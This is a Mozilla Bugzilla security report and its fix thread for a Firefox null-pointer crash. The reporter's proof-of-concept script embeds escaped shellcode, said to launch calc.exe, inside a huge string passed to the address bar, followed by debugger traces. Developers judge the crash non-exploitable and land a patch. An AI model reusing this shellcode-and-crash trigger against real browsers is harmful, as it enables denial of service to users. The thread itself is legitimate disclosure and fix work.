Closed
Bug 614756
Opened 14 years ago
Closed 14 years ago
Firefox pointer dereference
Categories
(Core :: DOM: Navigation, defect)
Core
DOM: Navigation
Tracking
()
RESOLVED
FIXED
mozilla2.0b8
People
(Reporter: info, Assigned: MatsPalmgren_bugz)
Details
(Keywords: crash, Whiteboard: [sg:dos] safe null-pointer read)
Attachments
(2 files)
486 bytes,
text/html
|
Details | |
2.91 KB,
patch
|
smaug
:
review+
roc
:
approval2.0+
dveditz
:
approval1.9.2.14+
dveditz
:
approval1.9.1.17+
|
Details | Diff | Splinter Review |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.2.12) Gecko/20101026
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.2.12) Gecko/20101026
A (NULL) pointer derefence was discovered in Firefox, by creating a huge escaped Unicode string and pass it to the address bar. The string length is determined, copied into memory and a wrong pointer results in a NULL being passed as argument and dereferenced leading to a segmentation fault, and eventually crashes the Firefox application because of it.
Vulnerability: Memory access violation.
Problem: (NULL) pointer derefence, leads to segmentation fault.
Serverity: Medium.
Image: MOZCRT19.dll
Procedure: MOZCRT19 strlen(unsigned char * buf = <Memory access error>)+0x30
Code execution: Unlikely.
Expected: Fix pointer in code, and/or trap exception.
code:
Code:
<script>
var poison = '';
var header = unescape("%u5050%u5050");
// Path to calc.exe on WINXP SP3, for testing only.
// can be filled with any random chars.
var shellcode = unescape(
"%u16eb%u315b%u50c0%ubb53"
+ "%u250d%u7c86%ud3ff"
+ "%uc031%ubb50%ucb12"
+ "%u7c81%ud3ff%ue5e8"
+ "%uffff%u63ff%u6c61"
+ "%u2e63%u7865%u0065");
while (header.length < (shellcode.length+41)) { header += header };
for(i=0;i<999999;i++) {
poison += header;
poison += shellcode;
}
document.location = 'http://' + header + poison;
</script>
Stacktrace.
-------------------------------------------------------------------------------------------------------
Call stack of main thread
Address Procedure / arguments Called from
0012DF88 <JMP.&MOZCRT19.strlen> xul.10341904
0012DF8C s = NULL ; passed argument NULL!
0012DFF8 xul.100A19C0 xul.100845EA
0012E008 xul.100845DD xul.106471CF
0012E00C Arg1 = 00000000
0012E010 Arg2 = FFFFFFFF
-------------------------------------------------------------------------------------------------------
10341904 8 3350FBFF CALL <JMP.&MOZCRT19.strlen> ; \strlen s=NULL
0012E00C Arg1 = 00000000
-------------------------------------------------------------------------------------------------------
102F6910 >/$ 56 PUSH ESI
102F6911 |. 8B7424 0C MOV ESI,DWORD PTR SS:[ESP+C]
102F6915 |. 83FE 01 CMP ESI,1
102F6918 |. 75 05 JNZ SHORT xul.102F691F
102F691A |. E8 D10A0000 CALL xul.102F73F0
102F691F |> 8B4424 08 MOV EAX,DWORD PTR SS:[ESP+8]
102F6923 |. 8B4C24 10 MOV ECX,DWORD PTR SS:[ESP+10]
102F6927 |. 50 PUSH EAX
102F6928 |. 8BD6 MOV EDX,ESI
102F692A |. E8 71FEFFFF CALL xul.102F67A0
102F692F |. 83C4 04 ADD ESP,4
102F6932 |. 5E POP ESI
102F6933 \. C2 0C00 RETN 0C
102F6936 $-FF25 5C268310 JMP DWORD PTR DS:[<&MOZCRT19.??_V@YAXPAX>; MOZCRT19.??_V@YAXPAX@Z
102F693C $-FF25 60268310 JMP DWORD PTR DS:[<&MOZCRT19.strlen>] ; MOZCRT19.strlen
102F6942 $-FF25 68268310 JMP DWORD PTR DS:[<&MOZCRT19.memcpy>] ; MOZCRT19.memcpy
102F6948 $-FF25 70268310 JMP DWORD PTR DS:[<&MOZCRT19.strcmp>] ; MOZCRT19.strcmp
102F694E $-FF25 74268310 JMP DWORD PTR DS:[<&MOZCRT19.??_U@YAPAXI>; MOZCRT19.??_U@YAPAXI@Z
102F6954 $-FF25 84268310 JMP DWORD PTR DS:[<&MOZCRT19.__iob_func>>; MOZCRT19.__p__iob
102F695A $-FF25 9C268310 JMP DWORD PTR DS:[<&MOZCRT19.free>] ; MOZCRT19.free
102F6960 $-FF25 A0268310 JMP DWORD PTR DS:[<&MOZCRT19.strchr>] ; MOZCRT19.strchr
102F6966 $-FF25 E4268310 JMP DWORD PTR DS:[<&MOZCRT19.strcpy>] ; MOZCRT19.strcpy
102F696C $-FF25 FC268310 JMP DWORD PTR DS:[<&MOZCRT19.strncmp>] ; MOZCRT19.strncmp
102F6972 $-FF25 00278310 JMP DWORD PTR DS:[<&MOZCRT19.fprintf>] ; MOZCRT19.fprintf
102F6978 .-FF25 14278310 JMP DWORD PTR DS:[<&MOZCRT19.?what@excep>; MOZCRT19.?what@exception@std@@UBEPBDXZ
102F697E .-FF25 2C278310 JMP DWORD PTR DS:[<&MOZCRT19.??0exceptio>; MOZCRT19.??0exception@std@@QAE@ABV01@@Z
102F6984 CC INT3
-------------------------------------------------------------------------------------------------------
EAX 3BC06466
ECX 00000000
EDX 0000001F
EBX 00000000
ESP 0012DF88
EBP 0000001F
ESI FFFFFFFF
EDI 0012E0D4
EIP 78150580 MOZCRT19.78150580
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 1 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDE000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty 318.00000000000000000
ST1 empty 0.0
ST2 empty 1.0000000000000000000
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 1.0000000000000000000
ST6 empty 0.0
ST7 empty 2152398878.0000000000
3 2 1 0 E S P U O Z D I
FST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
-------------------------------------------------------------------------------------------------------
0012df84 10341909 MOZCRT19!strlen(unsigned char * buf = <Memory access error>)+0x30
intel\strlen.asm @ 81]
; passing a NULL!
-------------------------------------------------------------------------------------------------------
78150580 8b01 mov eax,dword ptr [ecx]
-------------------------------------------------------------------------------------------------------
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 78150580 (MOZCRT19!strlen+0x00000030)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 00000000
Attempt to read from address 00000000
-------------------------------------------------------------------------------------------------------
Message=[06:54:28] Access violation when reading [00000000]
-------------------------------------------------------------------------------------------------------
Reproducible: Always
Steps to Reproduce:
1. Run attached code
2. sit still
3. ...
Actual Results:
Crash.
Expected Results:
Raised exception.
Fix pointer, exception trap.
Reporter | ||
Comment 1•14 years ago
|
||
Updated•14 years ago
|
Summary: Firefox pointer derefence → Firefox pointer dereference
Comment 2•14 years ago
|
||
Marking security-sensitive for now in order to make sure triage is done properly.
Group: core-security
Keywords: crash
Assignee | ||
Comment 3•14 years ago
|
||
bp-73f94aba-e0c2-4aa5-b592-ef3532101125
This is a non-exploitable null-pointer crash; we're doing strlen(NULL)
in ReplaceASCII() here:
http://bonsai.mozilla.org/cvsblame.cgi?file=/mozilla/xpcom/string/src/nsTSubstring.cpp&rev=1.26&root=/cvsroot&mark=510#507
The root of the problem is in nsDocShell::LoadErrorPage()
http://bonsai.mozilla.org/cvsblame.cgi?file=/mozilla/docshell/base/nsDocShell.cpp&rev=1.919&root=/cvsroot#3275
which tries to build a new URL based on the content page url and
a few other parameters. The page url is string near maximum (2GB).
nsEscape() returns NULL on OOM. AppendASCII(NULL) leads to strlen(NULL).
I have a fix for this, just want to make sure it doesn't lead to new
problems...
Component: Security → History: Global
OS: Windows XP → All
Product: Firefox → Core
QA Contact: firefox → history.global
Hardware: x86 → All
Whiteboard: [sg:dos] safe null-pointer read
Assignee | ||
Updated•14 years ago
|
Assignee: nobody → matspal
Status: UNCONFIRMED → NEW
Component: History: Global → Document Navigation
Ever confirmed: true
QA Contact: history.global → docshell
Assignee | ||
Comment 4•14 years ago
|
||
BTW, the "slow script" dialog comes up with a clean profile for me
on both Linux and WinXP.
Sasha, did you get that dialog?
Assignee | ||
Comment 5•14 years ago
|
||
Patch is against 1.9.2, but it also applies to mozilla-central and 1.9.1.
Attachment #493324 -
Flags: review?(Olli.Pettay)
Reporter | ||
Comment 6•14 years ago
|
||
Hi Mats,
I did not get the dialog. I got a dialog on MSIE 7,8 in emulation mode but not on Firefox. But this can be circumvented by making smaller loops and concatenate them if it actually does happen.
I tried to find some more information about MOZCRT19.dll, but could not find anything. So it was a wild guess what was actually happening. Good to see the root of the problem, clarifies a lot.
Updated•14 years ago
|
Attachment #493324 -
Flags: review?(Olli.Pettay) → review+
Assignee | ||
Comment 7•14 years ago
|
||
smaug: the #undef is just to avoid a (future) name clash. I'll take it out
if you think it's unnecessary.
Assignee | ||
Updated•14 years ago
|
Attachment #493324 -
Flags: approval2.0?
Assignee | ||
Updated•14 years ago
|
status1.9.1:
--- → ?
status1.9.2:
--- → ?
Attachment #493324 -
Flags: approval2.0? → approval2.0+
Assignee | ||
Comment 8•14 years ago
|
||
Status: NEW → RESOLVED
Closed: 14 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla2.0b8
Assignee | ||
Updated•14 years ago
|
Attachment #493324 -
Flags: approval1.9.2.14?
Attachment #493324 -
Flags: approval1.9.1.17?
Comment 9•14 years ago
|
||
Comment on attachment 493324 [details] [diff] [review]
Patch rev. 1
Approved for 1.9.2.14 and 1.9.1.17, a=dveditz for release-drivers
Attachment #493324 -
Flags: approval1.9.2.14?
Attachment #493324 -
Flags: approval1.9.2.14+
Attachment #493324 -
Flags: approval1.9.1.17?
Attachment #493324 -
Flags: approval1.9.1.17+
Updated•14 years ago
|
Group: core-security
Assignee | ||
Comment 10•14 years ago
|
||
http://hg.mozilla.org/releases/mozilla-1.9.2/rev/ab2ea7569e43
http://hg.mozilla.org/releases/mozilla-1.9.1/rev/a68d38b17132
You need to log in
before you can comment on or make changes to this bug.
Description
•